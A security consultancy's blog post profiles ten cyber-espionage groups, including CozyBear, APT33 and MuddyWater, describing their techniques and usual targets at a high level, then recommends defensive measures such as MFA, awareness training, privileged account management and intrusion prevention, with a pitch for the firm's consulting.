10 Known Cyber Espionage Groups and How to Protect Yourself

10 Known Cyber Espionage Groups and How to Protect Yourself

The world’s new reality is inescapable: cyber espionage groups are out there, and even if your organization isn’t a direct target, it’s increasingly likely that you may still suffer their impact.

As we learned during the recent SolarWinds hack, the fact that our world has turned to a highly digital supply chain means companies are so intertwined that if one falls, it can knock out hundreds, if not thousands, more.

But what cyber espionage groups – also known as advanced persistent threats (APT) – are out there right now? What are their common techniques and what have they been doing recently? Below we outline a list of 10 of the top APT groups to be aware of in 2021 – and how to defend against common hacker tactics. 

Read more: “Should German businesses care about the SolarWinds hack?

1. CozyBear

Hitting headlines recently as the suspected perpetrators of the SolarWinds attack, CozyBear is probably one of the most prominent cyber espionage groups in this list.

This APT is believed to be Russian in origin, likely backed by the FSB. They’ve been in operation for quite some time, with researchers dating their activities as far back as 2008. As you can imagine, this means they’ve had quite a history, having been the suspects behind numerous major cyber attacks: 

  1. The SolarWinds hack. Source
  2. Spear phishing activities against coronavirus researchers in the UK. Source
  3. The Democrat party (DNC) hack from the 2016 US elections. Source
  4. An attack on the Norwegian government. Source

Other known names: APT29, YTTRIUM, The Dukes and Office Monkeys.

Typical techniques

Having been in operation for so long, CozyBear has been associated with a number of different malware kits, and changes toolset frequently. These are some of the notable attack vectors:

  • The group has used wide-net phishing commonly (in contrast to the spear-phishing attacks of many of the groups below), sending sometimes thousands of emails to a broad range of targets.
  • Victims are sent to a hacked website that contains a ZIP archive of CozyBear’s malware, which displays as an empty PDF decoy to the user.
  •  In an alternative technique, victims were shown a Flash video called “Office Monkeys LOL Video.zip”, which was not only a video player but also a dropper for the group’s CozyDuke malware kit.
  • One technique CozyBear uses that isn’t seen so much in some of the other APTs on this list is that the Russian actors use social media to communicate with their command and control (C&C) centre. By using the likes of Twitter to send information to the C&C, it helps them avoid detection.
  • CozyBear can also hide its network activity by using fake .JPG files. These files appear as photo uploads to a website, but are in fact files of stolen data simply masquerading as a JPG.

Who is at risk?

CozyBear appears to prefer targeting high-value government-related departments in the US, UK, European Union (including Norway and Germany), South Korea and Uzbekistan.

Their goal appears predominantly related to cyber espionage, stealing data from victims.

Find out more: CozyBear on MITRE ATT&CK

2. Gorgon Group

Gorgon Group was first suspected as existing when cyber security research firm Unit 42 began tracking a Pakistani attack known as Subaat, which commenced in 2017 and targeted a US organization with phishing attacks.

Technical analysis of this incident began to suggest that the attackers were working with a wider organization, dubbed Gorgon. Gorgon is notable as a group because it was attributed to the 2019 US$160 million MasterMana Botnet hack, which targeted corporations around the world with the intent to, among other goals, steal credentials associated with crypto wallets. Indeed, Gorgon’s latest attack vectors are very similar to those used in the MasterMana days.

Typical techniques

Gorgon Group has been known to use three attack vectors:

  1. Using common third-party services (i.e. Discord and PowerPoint) to install malicious software on the victim computer. Users click on a link in Discord to download what looks like an innocent file, but the file contains a trojanized macro that begins process hollowing in order to inject a piece of malware known as Azorult into the system undetected.
    a) Azorult is a well-known credential harvesting malware which can also upload or download files and take screenshots.
  2. The second vector does not rely so much on third parties. Through a phishing email campaign, users are prompted to open an Excel document. Another malicious macro downloads a file (this time masquerading as a .JPG) from a domain controlled by the APT. The .JPG actually contains ASCII text which reveals a PowerShell script that disables Windows Defender and Windows updates, then downloads an HTML executable.
  3. The third vector relies more on Gorgon-controlled infrastructure. Phishing emails trick victims into downloading a spoofed file with another malicious macro, which then downloads an ASCII text file pretending to be an image. The PowerShell script in this vector initiates a multi-step process that downloads as many as four new files, each preparing the system to eventually install a remote-access trojan called njRat for credential harvesting and stealing other confidential information.

Who is at risk? 

The United States and Germany accounted for 21% and 11% respectively of Gorgon’s victims, specifically of their first attack vector (Prevailion). The US was also a major target of vector two, as was South Korea and India. Switzerland and Singapore made up the majority of targets for vector three.

Some data also suggests the group had an interest in European affairs as well as the utilities sector in the UAE (Dubai in particular).

Unit 42 has also detected Gorgon Group targeting US, Russian and Spanish organizations operating in Pakistan.

Find out more: Gorgon Group on MITRE ATT&CK

3. Deep Panda

Deep Panda is a Chinese group which CrowdStrike considers one of the most advanced state-backed hackers in that region of the world.

Indeed, the well-known Anthem hack was attributed to Deep Panda. So was the OPM hack.

Recently at time of writing, a Chinese state-backed hacker group attacked Microsoft – dubbed HAFNIUM. The use of webshells and tools such as CrowdStrike bears some resemblance to Deep Panda, although this is speculation and not an official link.

Other known names: KungFu Kittens, Shell Crew, WebMasters.

Typical techniques

Stealth appears to be Deep Panda’s specialty. The group utilizes a variety of specialist processes designed to install their backdoor malware while leaving a minimal footprint in the victim’s network.

  • Like most groups in this list, Deep Panda first reconnoitres a victim’s system looking for a common back door, then uses spear phishing and social engineering to gain an entry point.
  • In one case, at tech company EMC, Deep Panda set up a fake user profile on an engineering website, uploaded a malicious file and then sent emails as this fake person to trick people into downloading the file.
  • From here the group uses PowerShell scripts to download and execute programs in-memory, without writing to disk and thus risking being caught by monitoring software. Such malware includes their MadHatter .NET RAT. The group has also been known to use webshells.

Who is at risk?

Organizations based out of the United States appear to be most at risk, particular in the government, defense, financial and telecommunications sectors.

Find out more: Deep Panda on MITRE ATT&CK

4. Bouncing Golf 

Most of the threat actors in this list have a strong focus on Windows computers – but Bouncing Golf has figured out how to hit people on their mobile devices.

The group was detected by antivirus company Trend Micro in June 2019, at which point their malware – GolfSpy – was reported to have infected over 660 devices. Unfortunately, the group’s origin is not known at time of writing, because they have been working hard to cover their tracks: masking registrant contact details of their C&C domains, for example.

That said, Trend Micro has seen similarities between GolfSpy’s code and that of another known APT group, Domestic Kitten. Domestic Kitten is believed to be Iranian in origin, and uses similar techniques.

Typical techniques

Bouncing Golf tries to sneak its malware onto mobile devices by parading GolfSpy as a legitimate application.

  • The group repackages its malware to pose as communication, news, lifestyle, book and reference Android apps popularly used in the Middle East.
  • Bouncing Golf promotes their app on social media (they don’t host it on Google Play), which directs users to a website where they can download and install the fake software.
  • Once installed, GolfSpy can steal data, including:
  • Device accounts
  • Call logs
  • Files
  • Device location
  • Images and videos
  • SMS messages
  • The app can also be commanded to delete or rename files, download/upload files, take screenshots, install more apps, record audio and video, and update itself.

Who is at risk 

Bouncing Golf activity has been detected primarily in Middle Eastern countries, with a focus on stealing military-related data.

Domestic Kitten, the espionage group that may be similar to Bouncing Golf, has been observed targeting Turkish and Kurdish natives and ISIS supporters in Afghanistan, Iran, Iraq and the UK.

Given the nature of GolfSpy and the information it can steal, anyone in the phonebooks of these victims or who are related to them in any way via their devices could also be at risk.

5. CopyKittens 

CopyKittens is a slightly less technically advanced APT using simpler techniques than some of its peers – simpler, but still highly dangerous.

They are believed to be Iranian and operating since 2013, having been first detected by Trend Micro and ClearSky in 2015.

CopyKittens conducted an enormous cyber espionage campaign for years, which was dubbed Operation Wilted Tulip. One notable attack example was when the group compromised an email address from the Ministry of Foreign Affairs in Northern Cyprus, then using it as a decoy to try and infect other government organizations around the globe.

Typical techniques

While CopyKittens may not act with the same level of sophistication as some of the other names in this list (for example, they don’t use any zero-day exploits), they are by no means a threat to be ignored.

  • CopyKittens tries to attack its victims from multiple angles, increasing the chance that at least one is bound to succeed. Spear phishing is common, as well as using fake social media profiles and trying to leverage exposed webmail accounts such as Microsoft, Google, Amazon and Facebook.
  • The group also uses watering hole attacks, compromising online news outlets and other websites to trick victims into thinking they are legitimate.
  • CopyKitten’s goal with so many attack angles is to establish a ‘beachhead’ of infection in a victim’s account, which can then be used to manoeuvre elsewhere within the network and – with clever use of decoys – infect other organizations too.

○      This makes it likely that victims may come under attack not directly, but via their digital supply chain. If you haven’t read it, we’d encourage you to read our article on why Germans should care about the SolarWinds hack to learn more about their digital supply chain vulnerabilities.

  • The group uses off-the-shelf malware as well as some of its own custom tools. For example, they’ve been observed using Mimikatz, Empire, Metasploit and the trial version of Cobalt Strike.
  • Their RAT, Matryoshka, is believed to have been self-developed.

Who is at risk?

CopyKittens has been launching data gathering attacks on countries such as Germany, Israel, Saudi Arabia, Turkey, the US and Jordan. Some other nations have been attacked, too, as well as UN employees.

Mainly, CopyKittens seems to go after sectors such as government institutions, academic institutions, defense companies, municipal authorities, subcontractors of defense ministries and large IT companies. One major victim, for example, was the German Bundestag.

Find out more: CopyKittens on MITRE ATT&CK

6. APT33

Security company FireEye believes APT33 started operations in 2013. Due to the group’s specific interests, snippets of Farsi language in their code, and the hours/days that APT33 members are known to operate (Saturday to Wednesday in the Iranian time zone), FireEye suspects that this group is Iranian in origin and backed by the Iranian state.

Other known names: HOLMIUM, Elfin

Typical techniques

Spear phishing is a major tactic of APT33, with attacks masquerading as legitimate job openings at desirable companies.

  • Employees in key organizations are targeted with malicious HTML applications that automatically download APT33’s backdoor software. To the user, the file appears innocent. 
  • These phishing emails can also send users to spoofed company employment websites, which are sometimes so authentic-looking as to contain even that company’s Equal Opportunities hiring statement.
  • FireEye suspects APT33’s dropper software – DROPSHOT – may be capable of dropping the wiper malware known asSHAPESHIFT. APT33 hasn’t been directly observed using this destructive malware, but FireEye states that DROPSHOT is used exclusively by APT33 and there are instances where DROPSHOT has been associated with the use of SHAPESHIFT.
  • APT33’s backdoor, TURNEDUP, is capable of uploading or downloading files, taking screenshots, gathering system information and delivering reverse shells.

Who is at risk?

As far as nations go, APT33 has targeted organizations housed in the US, South Korea and Saudi Arabia.

In terms of sectors, the group seems to have a preference for aviation companies with ties to both military and commercial use, as well as the energy sector (petrochemical production in particular). Saudi Arabia seems to be a reasonably common focus area, with companies targeted overseas often having links to Saudi’s energy or aviation sectors.

APT33 may be working to learn more about Saudi Arabia’s capabilities as a means to enhance Iran’s work in these spaces.

Find out more: APT33 on MITRE ATT&CK

7. Charming Kitten 

Charming Kitten made headlines by launching a major phishing attack over the Christmas 2020 break – precisely when the world’s IT departments were less available to review and respond to potential threats.

The group is suspected of having been in operation since 2014, perhaps even 2013, and has links to the Iranian government. Charming Kitten also has strong links to APT Magic Hound, which we detail below.

Other known names: APT35, Phosphorus, Newscaster, Ajax

Typical techniques

Charming Kitten has most recently been associated with phishing campaigns using SMS and email.

  • Victims are urged to click on seemingly legit links that take them on a five-stage redirect chain designed to help bypass security layers until the user lands on a web domain entirely controlled by the group.
  • Charming Kitten then uses these spoofed domains to steal credentials. They even once made a website posing as ClearSky – the security group that was investigating them at the time.
  • In the past, Charming Kitten has used social media channels such as LinkedIn and WhatsApp to pose as journalists and build trust with potential victims, to coax them into clicking malicious links later on. For instance, attackers posed as Iranian journalists working for Deutsche Welle and attempted to sign victims up for a ‘webinar’ – which was, of course, fake.

○      This is a great example of how cyber espionage groups are evolving to use modern channels to hunt victims. Apps like WhatsApp, Telegram and Facebook Messenger are now potential channels for malware and must be considered as a part of organizational security just like email or web browsing.

Who is at risk?

Charming Kitten has been seen to go for members of think tanks, political research centres, university professors, journalists and environmental activitists. Their target countries centre around the Persian Gulf, the US and Europe – collectively victims appear to be individuals of interest to Iran.

Find out more: Charming Kitten on MITRE ATT&CK

8. Magic Hound 

Magic Hound attacks date back as far as 2014, and may date back even further – to 2011. The group has very close ties to some other well-known APTs, and in fact there are a few security reports out there that don’t even distinguish Magic Hound from Charming Kitten or its other aliases.

Unit 42 also performed a link analysis of Magic Hound’s infrastructure and tools and found that it may also have links to groups Rocket Kitten and Cobalt Gypsy.

Typical techniques

Magic Hound has so far not been observed using common exploit techniques, but rather social engineering tactics designed to compromise very specific targets.

  • Spear phishing is one way Magic Hound attacks victims, sending malicious packages to targets and using trojanized documents. These documents would often appear as innocuous files, such as government forms or even Christmas greeting e-cards.
  • Some of Magic Hounds techniques resemble Gorgon Group above in their use of Microsoft Word or Excel macros to call on PowerShell scripts that retrieve additional custom-designed espionage tools.
  • Some of the group’s files have been hosted on compromised or spoofed websites. In a few cases the websites were actually genuine, but were hosting malware – suggesting they had already been hacked. This included government departments. In other cases, websites were designed simply to look legitimate.
  • In the past, Magic Hound has used attack techniques such as IRC botsPython RATs and an open-source Meterpreter module called Magic Unicorn.

Who is at risk?

Whereas Charming Kitten has been observed targeting specific victims in positions of political or educational power, Magic Hound has been more direct in attacking government, technology and energy sector companies either based in or with an interest in Saudi Arabia (for example, the US).

Rocket Kitten, which may be linked as well, also uses spear phishing tactics to target individuals and organizations in the Middle East (even targets within Iran). Europe and the US were also of interest to the group, with victims often working in defense, political, research, human rights, media and journalism, academic, and scientific (i.e. nuclear) roles.

As for Cobalt Gypsy, activities from this group have appeared to target telecommunications, government, defense, oil and financial services firms in the Middle East and North Africa.

Find out more: Magic Hound on MITRE ATT&CK

9. MuddyWater

MuddyWater is an Iranian threat group that is relatively new compared to some of its cohorts, but which has been evolving steadily since 2019. Trend Micro does not consider it as advanced an APT as other groups (i.e. like CopyKittens, there’s no evidence here of the group using zero-day exploits or advanced malware kits), but they are agile and use what they have effectively.

For example, within days of Trend Micro publishing a report on the group in 2018, they changed some of their tactics.

Typical techniques

MuddyWater has been using spear phishing and Android malware to compromise its victims, covering their tracks as they go.

  • Spear phishing appears to be their way in. In a recent case study, MuddyWater actually compromised real email accounts and sent emails to potential victims so they appeared to originate from a trustworthy source.
  • These emails are designed to get victims to download a document containing trojanized macros that activated a PowerShell backdoor called POWERSTATS v3.
  • More recently, MuddyWater has been behind four Android malware variants posing as legitimate applications. These apps are the first of a two-stage attack designed to steal phone information such as call logs, SMS, contacts and screenshots. The first stage is also capable of spreading to other victims via SMS – sending harmful links to phonebook contacts in the hacked phone.
  • To help cover its tracks, the group has been engaging in false flag attacks. While believed to be Iranian themselves, the group’s members leave messages in their code designed to make it appear as though it was written in other countries, such as China, Russia, or Israel.

Who is at risk?

Common MuddyWater targets have been in the Middle East area (i.e. Turkey and Afghanistan), or Asia. More recently, though, the group has begun to target European nations as well as the US.

Most victims were governmental in nature, with a majority in education, foreign affairs, defense, interior, finance, trade and customs. There were also a number of victims found in the telecommunications sector, including telcos and web hosting providers.

Find out more: MuddyWater on MITRE ATT&CK

10. Windshift 

Windshift was first revealed to the world by security company DarkMatter at the 2018 Hack in the Box conference. DarkMatter’s researcher thought the group had been operational since 2016, and was notable because it targeted a group of quite uncommon victims – OSX users. Indeed, Windshift’s malware would not work on a Windows device. 

It’s also worth pointing out that Windshift’s MO is very similar to another known group called Bahamut, where some of the same infrastructure is used. In addition to OSX attacks, Bahamut was revealed by BlackBerry to employ at least one zero-day developer exhibiting a skill level “above and beyond other APTs.” 

Finally, there is one last thing of note. Windshift deploys tools that were developed by an Indian security company called Appin (whose website is now offline). Appin at the time denied any involvement in espionage, and it is believed their tools may have been stolen.

Typical techniques

Windshift utilizes techniques that will now be familiar to anyone who has read the other APT groups in this list – spear phishing and social media engineering. The key point of difference here is that they are capable of targeting Apple users.

  • Windshift utilizes highly targeted spear phishing attacks including links designed to harvest credentials.
  • Fake social media personas have been used to engage with people of interest in order to reconnoitre potential victims. Windshift monitors victims over a period of months using benign emails parading as legit content in order to gain the information they desire (i.e. subjects of interest, click habits, etc.). Once this persona has been built, the group begins its harvesting activities such as phishing emails, SMS texts and domain squatting.
  • If credential harvesting is unsuccessful after numerous attempts, the group may attempt a hack. This is where they would turn to malware, dropped malicious software into a victim’s device through one of the channels mentioned above.

Who is at risk?

Windshift has been highly targeted in their choice of victim, choosing specific individuals in government departments and critical infrastructure across the Gulf Cooperation Council region. As mentioned, it’s notable that Windshift can target OSX users as opposed to Windows or Android.

Bahamut is similar in its choice of targets, focusing on individuals over companies. Their targets are concentrated around political, economic and social spheres in the Middle East as well, in addition to South Asia (i.e. some spoofed websites focused on political issues such as the Sikh Referendum of 2020 in India).

Find out more: Windshift on MITRE ATT&CK

Quick wins to defend yourself against common APT attack vectors

To properly defend yourself against APT threats – or at least mitigate their risk – we would highly recommend that your enterprise performs a top-to-bottom analysis of the business using a modern security architecture framework.

Learn more about how security architecture can help here. 

To talk to a security professional about your individual organization and how it might be at threat, get in touch with us immediately for a free maturity consultation.

In the meantime, however, we know these things take time. Between now and then, there are a few quick-wins you can accomplish to better improve your security in relation to cyber espionage threats.

1. Multi-factor authentication

Multi-factor authentication (MfA) makes it that one step harder for outside actors to access your systems via compromised accounts (which, as we’ve seen by this point, is common). It can:

  • Improve your security, especially for those organizations with remote workers.
  • Be implemented relatively easily.
  • Help your enterprise meet regulatory requirements to do with security and access controls.

Tips for implementing multi-factor authentication:

  • Start with your admin accounts: CEO, CFO and senior managers.
  • Implement MfA within your Active Directory.
  • Consider using phone-based authentication apps. Receiving an SMS everytime you want to log in can get inconvenient for employees. People generally want to go passwordless eventually.
  • Run an awareness campaign throughout all levels of the business on the benefits of MfA, so employees understand their role in protecting the company. See our point below for more information on this.

Read more from Microsoft: How to implement Multi-Factor Authentication

2. Risk awareness training

Better security starts with your people. In fact, a company’s own staff tends to be one of its biggest weak points when it comes to cyber protection. As you can see clearly above, most threat groups look for entry points by targeting people with phishing links. 

Risk awareness training is your way to build a culture of cyber safety in your enterprise, from the most senior to the most junior employee. Everyone who has access to the system must know their role in protecting it. Risk awareness training will:

  • Teach staff their role in security.
  • Teach them how to spot suspicious activity (i.e. phishing emails).
  • Teach them how to report said activity to the security team.
  • Build good habits among staff, like using different passwords for different accounts or knowing not to install unapproved apps and software on company devices.

Tips for implementing risk awareness training:

  • Create training materials with a focus on engagement. These assets can be re-used for every new employee, and could help you train remote employees too.
  • Don’t just focus on ‘protecting the business’, but also ‘protecting yourself’. Cyber security is as much about employees protecting themselves and their peers as it is the wider business. Imagine how terrifying it would be to have your smartphone hacked – that’s a personal safety issue, not just company.
  • Be open and transparent in your communication about the what and why of this training. Address your employees’ concerns about MfA, try to put their minds at ease.
  • If you struggle to win enthusiasm for the new changes, you could try to use incentives to encourage switching to better habits.

3. Modern anti-malware/anti-virus software

While some of the more advanced cyber espionage groups have techniques that help them circumvent malware monitoring services, it’s still vital that your company’s computers come equipped with the most up-to-date software you can get in order to mitigate much of the risk.

Not only that, but you will need a policy in place to ensure that your devices remain up to date over time. There’s no use investing in anti-virus software now only for it to become irrelevant in a couple of years.

Good anti-virus software will:

  • Scan for threats and remove them, even relatively new threats – security companies are constantly researching new threats and updating their systems to match.
  • Scan emails and web domains to try and prevent users from accessing malicious files online.
  • Protect you from ransomware attacks. Anti-ransomware services can help you backup your data to prevent loss due to ransomware.

Tips for finding the right anti-malware software:

  • Agree on an enterprise-level anti-malware strategy at the senior management level of your business. What is your risk appetite? How will an anti-virus tool fit into that? Who will install it? Who will update it?
  • Know that you can’t take a blanket approach to this. The task of finding suitable software needs to be divided up into key areas (which have their own unique needs). These are:

○      Network perimeter

○      Mail servers

○      LAN servers

○      Workstations (including home and remote users, contractors and vendors).

  • Ask yourself these questions:

○      What are the top threats you must contend with?

○      Will the software slow down your pre-existing software, or crash it?

○      Is the software easy to use?

○      How frequently is it updated with new threats?

○      Is the vendor able or willing to support your roll-out, and will they provide ongoing support?

4. Privileged account management (PAM)

When everyone can access everything, it only takes one user to be compromised for an APT to get their hands on your data. So, ensuring that some of your IT users are more ‘privileged’ than others means only the people you trust have administrative access to critical systems.

  • What is a privileged user? Privileged users have admin access to important systems. They can make changes, delete things, add new things (i.e. user accounts, new software), run maintenance operations and so on.

Tips for implementing PAM:

  • Only assign privileged access to users whom you trust. That is, users who have security qualifications and/or who have gone through the required security training.
  • Write a PAM policy to clearly define who can be a privileged user and that it requires.
  • Into the PAM policy, write a review process so privileges are regularly audited to ensure integrity over time (i.e. old accounts are removed).

You will find that the principles of ZeroTrust are vital here. To learn more about ZeroTrust, watch our webinar on cloud security on demand, or read our article “4 critical steps to implementing best practice cloud architecture“.

5. Network intrusion prevention systems

Intrusion prevention systems are like the other side of the coin to anti-virus software. They’re designed to monitor network communications in an enterprise for suspicious activity and intervene where necessary. An IPS system will: 

  • Reroute all network traffic through itself, behind the firewall
  • Look for activity within network packets that seem suspicious and take action against them – sending alerts to admins, or blocking the communication outright.
  • Run in tandem with anti-virus, which looks specifically for dangerous executables online or locally. One blocks software, the other blocks traffic.

Tips for implementing a network IPS: 

  • Ensure all events in the IPS are timestamped. This is so you can correlate events with other activities happening at the same time, to potentially reduce false positive assumptions and save effort in future.
  • Use web filtering to create website blacklists and whitelists (again, saving time in future).
  • Implement IPS with SSL inspection capabilities, to intercept encrypted transmissions, decrypt, check for malicious files and re-crypt to on-send to the right destination. It may take some research to find a platform that can do this at scale without seriously slowing down, as the process is not always fast.
  • Also look to implement DDoS prevention. Distributed denial of service (DDoS) attacks are still very common and effective and some IPS systems aren’t equipped to handle their load. You’ll need a prevention system that is capable of detecting these attacks and stopping them before they cause harm.

6. Improved application monitoring 

Actively monitoring your applications can help your operations team spot potential threats as they occur, or very close to when they occur if not in real time. This is especially important for apps that are attractive to APTs, such as any that allow access to the system (i.e. they are internet facing), which generate revenue, or that have a compliance tick (i.e. GDPR, SOX).

Tips for implementing better application monitoring: 

It’s utterly critical that you work to expand your app teams from DevOps to DevSecOps – integrating experienced security personnel into the entire CI/CD pipeline from ideation right through to monitoring and feedback.

Including security experts at each stage of developments allows them to check for problems as you go, potentially mitigating the risk that an app will go to launch with major vulnerabilities undetected.

Learn more: “What is DevSecOps, and how is it different to DevOps?

Worried about cyber espionage groups? Don’t go it alone 

APTs are a very real threat no matter where your enterprise operates in the world. Even if your organization does not fit the “who is at risk” profiles we’ve outlined in this article, the simple fact that you’re connected to the digital supply chain puts you at risk.

That’s where we come in.

At dig8ital, we have extensive experience building better security architecture for even the largest organizations, having worked with some of Germany’s most prominent and complex businesses across sectors.

You don’t have to face the cyber threat alone. Contact us today for a free maturity consultation and let’s talk about what we can do for your unique business.

Share :